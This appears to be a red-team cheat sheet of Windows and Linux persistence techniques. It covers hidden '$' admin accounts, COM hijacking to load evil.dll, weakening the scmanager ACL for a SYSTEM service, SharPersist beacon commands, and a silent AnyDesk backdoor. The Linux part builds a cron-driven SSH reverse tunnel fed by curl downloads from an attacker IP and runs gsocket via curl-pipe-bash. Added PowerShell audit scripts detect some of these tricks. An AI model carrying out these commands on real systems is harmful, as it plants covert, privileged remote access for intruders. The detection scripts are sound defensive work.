Hidden Local User
Create the account with a trailing `$` (omitted by `net user`) and hide it from the logon screen through the Winlogon `SpecialAccounts\UserList` key (the DWORD name must match the account name exactly):

```
Cmd > net1.exe user snovvcrash$ Passw0rd! /add
PS > New-Item -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" -Force
PS > New-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" -Name 'snovvcrash$' -PropertyType DWORD -Value 0 -Force
```

Alternatively, running as SYSTEM, use Suborner:

```
PS > whoami
nt authority\system
PS > .\Suborner.exe /username:snovvcrash$ /password:Passw0rd!
```
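Added audit example (not part of the original notes) for the defender side of the two tricks above: it lists local accounts hidden from the logon screen via `SpecialAccounts\UserList` or from `net user` by a trailing `$`, and notes whether each is a local administrator. Function and property names are my own.

```powershell
# Added audit example (not from the original notes): surface local accounts that are
# hidden from the logon screen (SpecialAccounts\UserList = 0) or omitted by "net user"
# (name ends in "$"), and flag whether each one sits in the local Administrators group.
function Get-HiddenLocalUserIndicators {
    $userList = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList'
    $admins = @()
    try {
        # Get-LocalGroupMember returns "COMPUTER\name"; keep only the account name.
        $admins = (Get-LocalGroupMember -Group 'Administrators' -ErrorAction Stop).Name |
            ForEach-Object { $_.Split('\')[-1] }
    } catch { }

    $hidden = @{}   # account name -> list of reasons

    # 1. Explicit logon-screen hiding: a DWORD named after the account with value 0.
    if (Test-Path $userList) {
        $props = (Get-ItemProperty -Path $userList).PSObject.Properties |
            Where-Object { $_.Name -notlike 'PS*' -and $_.Value -eq 0 }   # skip PSPath etc.
        foreach ($p in $props) {
            $hidden[$p.Name] = @('SpecialAccounts\UserList = 0 (hidden from logon screen)')
        }
    }

    # 2. Accounts ending in "$" are omitted by "net user" but are still in the SAM,
    #    so Get-LocalUser sees them.
    foreach ($u in Get-LocalUser) {
        if ($u.Name.EndsWith('$')) {
            $hidden[$u.Name] = @($hidden[$u.Name]) + 'Name ends in "$" (omitted by net user)'
        }
    }

    foreach ($name in $hidden.Keys) {
        [pscustomobject]@{
            Account      = $name
            IsLocalAdmin = $admins -contains $name
            Reasons      = ($hidden[$name] | Where-Object { $_ }) -join '; '
        }
    }
}

Get-HiddenLocalUserIndicators | Format-Table -AutoSize
```

Run it in an elevated Windows PowerShell 5.1 or PowerShell 7 session on Windows (it relies on the LocalAccounts module); an empty result means neither indicator is present.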
COM Hijacking
Locate good targets to hijack with Procmon filters:
- Operation is RegOpenKey
- Result is NAME NOT FOUND
- Path is InprocServer32 (in-process server allowing the specified DLL to be loaded into the current process memory space)
Locate CLSIDs from scheduled tasks:
{% code title="schtask.ps1" %}
```powershell
# List enabled scheduled tasks whose action is a COM handler (ClassId set)
# and which run in the context of the Users group.
$Tasks = Get-ScheduledTask
foreach ($Task in $Tasks) {
    if ($null -ne $Task.Actions.ClassId) {
        if ($Task.Triggers.Enabled -eq $true) {
            if ($Task.Principal.GroupId -eq "Users") {
                Write-Host "Task Name: " $Task.TaskName
                Write-Host "Task Path: " $Task.TaskPath
                Write-Host "CLSID: " $Task.Actions.ClassId
                Write-Host
            }
        }
    }
}
```
{% endcode %}
Check if a COM component exists under a relevant registry hive by its CLSID:

```
PS > Get-ChildItem -Path "Registry::HKCR\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}"
PS > Get-Item -Path "HKLM:Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" | ft -AutoSize
PS > Get-Item -Path "HKCU:Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" | ft -AutoSize
```
If it exists under the HKLM hive but does not exist under HKCU, we can hijack this COM component by creating a new item in the latter path (the per-user registration is resolved first):
```
PS > New-Item -Path "HKCU:Software\Classes\CLSID" -Name "{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}"
PS > New-Item -Path "HKCU:Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" -Name "InprocServer32" -Value "C:\Windows\Tasks\evil.dll"
PS > New-ItemProperty -Path "HKCU:Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}\InprocServer32" -Name "ThreadingModel" -Value "Both"
PS > Get-ItemProperty -Path "HKCU:Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}\InprocServer32"
```
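As an added hunting example (not from the original notes), this script inverts the manual check above: it enumerates every CLSID registered with an InprocServer32 in the current user's hive, reports those that shadow a machine-wide HKLM registration with a different DLL, and cross-references the result against scheduled tasks that launch a COM handler (the same data schtask.ps1 walks). Function and output property names are my own.

```powershell
# Added hunting example (not from the original notes): a per-user InprocServer32 that
# differs from the HKLM one for the same CLSID is the footprint of the hijack above.
function Find-UserHiveComShadowing {
    $userClsidRoot = 'HKCU:\Software\Classes\CLSID'
    if (-not (Test-Path $userClsidRoot)) { return }
    foreach ($key in Get-ChildItem -Path $userClsidRoot) {
        $clsid  = $key.PSChildName
        $inproc = "$userClsidRoot\$clsid\InprocServer32"
        if (-not (Test-Path $inproc)) { continue }
        # The DLL path lives in the key's unnamed (default) value.
        $userDll       = (Get-ItemProperty -Path $inproc).'(default)'
        $machineInproc = "HKLM:\Software\Classes\CLSID\$clsid\InprocServer32"
        $machineDll    = if (Test-Path $machineInproc) {
            (Get-ItemProperty -Path $machineInproc).'(default)'
        } else { $null }
        [pscustomobject]@{
            CLSID      = $clsid
            UserDll    = $userDll
            MachineDll = $machineDll
            DllOnDisk  = [bool]$userDll -and (Test-Path -LiteralPath ([Environment]::ExpandEnvironmentVariables($userDll)))
            Shadows    = ([bool]$machineDll) -and ($userDll -ne $machineDll)
        }
    }
}

# Tie shadowed CLSIDs back to the scheduled tasks that would load them.
function Find-TaskComHandlerHijacks {
    $shadowed = @(Find-UserHiveComShadowing | Where-Object Shadows)
    if ($shadowed.Count -eq 0) { return }
    foreach ($task in Get-ScheduledTask) {
        foreach ($action in $task.Actions) {
            # Only MSFT_TaskComHandlerAction carries ClassId; Exec actions yield $null here.
            if ($action.ClassId -and ($shadowed.CLSID -contains $action.ClassId)) {
                [pscustomobject]@{
                    TaskName = $task.TaskName
                    TaskPath = $task.TaskPath
                    CLSID    = $action.ClassId
                    UserDll  = ($shadowed | Where-Object CLSID -eq $action.ClassId).UserDll
                }
            }
        }
    }
}

Find-UserHiveComShadowing | Where-Object Shadows | Format-Table -AutoSize
Find-TaskComHandlerHijacks | Format-Table -AutoSize
```

Running it in the context of each interactive user matters, since HKCU is per user; a hit with `DllOnDisk` false is still worth triage, as the hijack may be staged before the DLL is dropped.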
RID Hijacking
- https://r4wsecurity.blogspot.com/2017/12/rid-hijacking-maintaining-access-on.html
- https://github.com/r4wd3r/RID-Hijacking
LNK
- https://v3ded.github.io/redteam/abusing-lnk-features-for-initial-access-and-persistence
- https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/master/Create-HotKeyLNK.ps1
- https://redsiege.com/blog/2024/04/sshishing-abusing-shortcut-files-and-the-windows-ssh-client-for-initial-access/
AnyDesk
- https://support.anydesk.com/knowledge/use-cases-for-the-command-line-interface
- https://support.anydesk.com/knowledge/command-line-interface-for-windows

```
Cmd > bitsadmin /transfer job1 https://download.anydesk.com/AnyDesk-CM.exe C:\Users\snovvcrash\AppData\Local\Temp\anydesk.exe
Cmd > C:\Users\snovvcrash\AppData\Local\Temp\anydesk.exe --install C:\Users\snovvcrash\AppData\Local\AnyDesk --start-with-win --silent
Cmd > del C:\Users\snovvcrash\AppData\Local\Temp\anydesk.exe
Cmd > echo Passw0rd! | C:\Users\snovvcrash\AppData\Local\AnyDesk\AnyDesk.exe --set-password
Cmd > cmd /c "for /f ""delims="" %i in ('C:\Users\snovvcrash\AppData\Local\AnyDesk\AnyDesk.exe --get-id') do echo %i"
Cmd > C:\Users\snovvcrash\AppData\Local\AnyDesk\AnyDesk.exe --remove
```
scmanager
- https://0xv1n.github.io/posts/scmanager/
- https://gist.github.com/pich4ya/c15af736f0f494c1a560e6c837d77828

{% embed url="https://twitter.com/0gtweet/status/1628720819537936386" %}

Back up the current SDDL for scmanager:

```
Cmd > sc.exe sdshow scmanager
```

Change it to allow everyone to create a service:

```
Cmd > sc.exe sdset scmanager D:(A;;KA;;;WD)
```

Create a service that will auto-run at next reboot:

```
Cmd > sc.exe create lpesvc displayName= "lpesvc" binPath= "C:\Windows\System32\net.exe localgroup administrators snovvcrash /add" obj= LocalSystem start= auto
```

Check if the scmanager SDDL has been modified:

```
PS > ConvertFrom-SddlString -Sddl $(sc.exe sdshow scmanager | select -Last 1) | select -Expand DiscretionaryAcl
```
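Added audit example (not from the original notes) that goes one step past `ConvertFrom-SddlString`: it parses the live scmanager SDDL with .NET's `RawSecurityDescriptor` and flags AccessAllowed ACEs that grant `SC_MANAGER_CREATE_SERVICE` (0x0002) to broad principals. The function name is my own; the sample SDDL fed to it is the permissive one from the `sdset` command above.

```powershell
# Added audit example (not from the original notes): detect the weakened scmanager ACL.
# SC_MANAGER_CREATE_SERVICE is bit 0x0002 of the access mask; the generic "KA" right
# (0x000F003F) used above includes it, as does any explicit "CC"-style grant of 0x2.
function Test-ScManagerCreateServiceExposure {
    param(
        # Defaults to the live SDDL; the first line of "sc.exe sdshow" output is blank.
        [string]$Sddl = (sc.exe sdshow scmanager | Where-Object { $_ -match '^D:' } | Select-Object -First 1)
    )
    $createService = 0x2
    # Principals that should never be able to create services on a workstation or server.
    $broad = @{
        'S-1-1-0'      = 'Everyone'
        'S-1-5-11'     = 'Authenticated Users'
        'S-1-5-32-545' = 'Users'
        'S-1-5-4'      = 'Interactive'
    }
    $sd = [System.Security.AccessControl.RawSecurityDescriptor]::new($Sddl)
    foreach ($ace in $sd.DiscretionaryAcl) {
        if ($ace -isnot [System.Security.AccessControl.CommonAce]) { continue }
        if ($ace.AceType -ne 'AccessAllowed') { continue }
        $sid = $ace.SecurityIdentifier.Value
        if (($ace.AccessMask -band $createService) -and $broad.ContainsKey($sid)) {
            [pscustomobject]@{
                Principal  = $broad[$sid]
                Sid        = $sid
                AccessMask = ('0x{0:X8}' -f $ace.AccessMask)
            }
        }
    }
}

# The permissive SDDL from the notes above flags Everyone (S-1-1-0) with mask 0x000F003F.
Test-ScManagerCreateServiceExposure -Sddl 'D:(A;;KA;;;WD)' | Format-Table -AutoSize

# Live check of this host; no output means no broad principal can create services.
Test-ScManagerCreateServiceExposure | Format-Table -AutoSize
```

If the live check returns rows, restore the descriptor from the `sdshow` backup taken above rather than hand-editing the ACL.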
SharPersist

```
beacon> execute-assembly SharPersist.exe -t schtask -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc <BASE64_CMD>" -n "Updater" -m add -o hourly
beacon> execute-assembly SharPersist.exe -t startupfolder -f "UserEnvSetup" -m add
beacon> execute-assembly SharPersist.exe -t reg -c "C:\ProgramData\Updater.exe" -a "/q /n" -k "hkcurun" -v "Updater" -m add
```
SSH Reverse Tunnel
Add a temporary rule allowing connections from your IP:

```
$ sudo iptables -A INPUT -p tcp -s 10.10.13.37 --dport 22 -j ACCEPT
```
{% code title="callback.sh" %}
```bash
#!/bin/bash
# grep -c counts its own process too, so a count of 1 means no tunnel on port 2222 is up yet.
# Options in [...] are optional: the first pair is only needed for servers that still
# require ssh-rsa, the second pair keeps the tunnel alive across idle periods.
if [[ `ps -ef | grep -c 2222` -eq 1 ]]; then
    /usr/bin/ssh -nNT -R 2222:localhost:22 [-oPubkeyAcceptedKeyTypes=+ssh-rsa -oHostKeyAlgorithms=+ssh-rsa] [-oServerAliveInterval=300 -oServerAliveCountMax=3] -oStrictHostKeyChecking=no -oUserKnownHostsFile=/dev/null -oIdentitiesOnly=yes -i /home/alice/.ssh/.k nopty@10.10.13.37
fi
```
{% endcode %}
Attacker's box (the `authorized_keys` options pin the key to the victim's IP, deny a shell, PTY and agent/X11 forwarding, so it can only be used for port forwarding):

```
$ sudo useradd -ms /bin/false nopty
$ sudo mkdir -m 700 /home/nopty/.ssh
$ sudo ssh-keygen -f /home/nopty/.ssh/dummy_key -t ed25519 -q -N ""
$ cat /home/nopty/.ssh/dummy_key.pub
$ sudo vi /home/nopty/.ssh/authorized_keys
from="10.10.13.38",command="echo 'Only port forwarding is allowed'",no-agent-forwarding,no-X11-forwarding,no-pty <DUMMY_KEY_PUB>
```
Victim's box:

```
$ curl 10.10.13.37/dummy_key > /home/alice/.ssh/.k
$ chmod 600 /home/alice/.ssh/.k
$ curl 10.10.13.37/callback.sh > /home/alice/.conf
$ chmod +x /home/alice/.conf
$ crontab -e
*/15 * * * * /home/alice/.conf
```
gsocket
Victim's box:

```
$ bash -c "$(curl -fsSL gsocket.io/x)"
$ bash -c "$(wget -qO- gsocket.io/x)"
```

Attacker's box:

```
$ cd ~/tools && bash -c "$(curl -fsSL https://tiny.cc/gsinst)" && cd
$ ~/tools/gsocket/tools/gs-netcat -s "<SECRET>" -i
```

Cleanup on the victim's box:

```
$ GS_UNDO=1 bash -c "$(curl -fsSL gsocket.io/x)"
$ GS_UNDO=1 bash -c "$(wget -qO- gsocket.io/x)"
$ pkill gs-bd
```